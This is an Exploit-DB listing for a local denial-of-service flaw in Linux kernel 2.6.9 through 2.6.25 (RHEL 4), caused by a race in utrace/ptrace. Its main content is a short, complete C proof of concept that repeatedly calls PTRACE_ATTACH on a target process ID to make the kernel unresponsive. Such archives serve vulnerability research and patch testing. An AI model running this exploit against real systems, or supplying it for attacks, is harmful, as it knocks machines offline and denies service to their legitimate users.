Lucene search

K
exploitdbAlexei DobryanovEDB-ID:31965
HistoryJun 25, 2008 - 12:00 a.m.

Linux Kernel 2.6.9 < 2.6.25 (RHEL 4) - utrace and ptrace Local Denial of Service (1)

2008-06-2500:00:00
Alexei Dobryanov
www.exploit-db.com
11

AI Score

7.4

Confidence

Low

/*
source: https://www.securityfocus.com/bid/29945/info

The Linux kernel is prone to a local denial-of-service vulnerability caused by a race condition.

Attackers can exploit this issue to cause the kernel to become unresponsive, denying service to legitimate users. 
*/


#include <stdlib.h>
#include <sys/ptrace.h>

int main(int argc, char *argv[])
{
	pid_t pid = atoi(argv[1]);

	while (1)
		ptrace(PTRACE_ATTACH, pid, NULL, NULL);

	return 0;
}